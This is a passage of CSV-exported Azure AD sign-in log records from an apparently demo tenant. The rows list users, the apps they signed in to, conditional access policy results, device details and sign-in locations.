'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41cc5746-ae7e-445a-962a-17f610500700,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,41cc5746-ae7e-445a-962a-17f610500700,SigninLogs,Sucess,33.0175209,35.44601059
+1438,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:04.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",508b0c76-ee67-4f38-8f76-558a86dc0700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Call Recorder,508b0c76-ee67-4f38-8f76-558a86dc0700,SigninLogs,Sucess,34.06555176,-118.2405396
+1439,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:03.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:46,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",cbcd7f19-25f4-4cfd-824c-94dc27c60500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,cbcd7f19-25f4-4cfd-824c-94dc27c60500,SigninLogs,Sucess,34.06555176,-118.2405396
+1440,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:09.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97e25473-b2a3-4e28-a400-10e31453b779,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5ef5316a-deee-4f03-8fd7-4abfaf540600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,5ef5316a-deee-4f03-8fd7-4abfaf540600,SigninLogs,Sucess,50.6406517,5.572050095
+1441,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:37.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,32ae469f-e0ef-0000-5d33-f20cbe0805e3,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:34,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5ef5316a-deee-4f03-8fd7-4abf94560600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5ef5316a-deee-4f03-8fd7-4abf94560600,SigninLogs,Sucess,50.6406517,5.572050095
+1442,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:43.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5509b988-bd2f-4848-84dd-6f93978b1fe9,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",b58c6208-3745-40bc-8745-ecaab5560800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Teams Chat Aggregator,b58c6208-3745-40bc-8745-ecaab5560800,SigninLogs,Sucess,34.06555176,-118.2405396
+1443,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:54.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",c1903f77-ceca-4811-8084-8940dbfc0e00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,c1903f77-ceca-4811-8084-8940dbfc0e00,SigninLogs,Sucess,51.4458313,-0.969720006
+1444,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d05a2ce7-2198-4a8a-b2e7-2787ea5c16fd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Loki,b23dd4db-9142-4734-867f-3577f640ad0c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 13:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",62115b57-0cb2-458e-8ba0-179e05591200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,62115b57-0cb2-458e-8ba0-179e05591200,SigninLogs,Sucess,33.7984581,-84.38828278
+1445,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,46:01.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 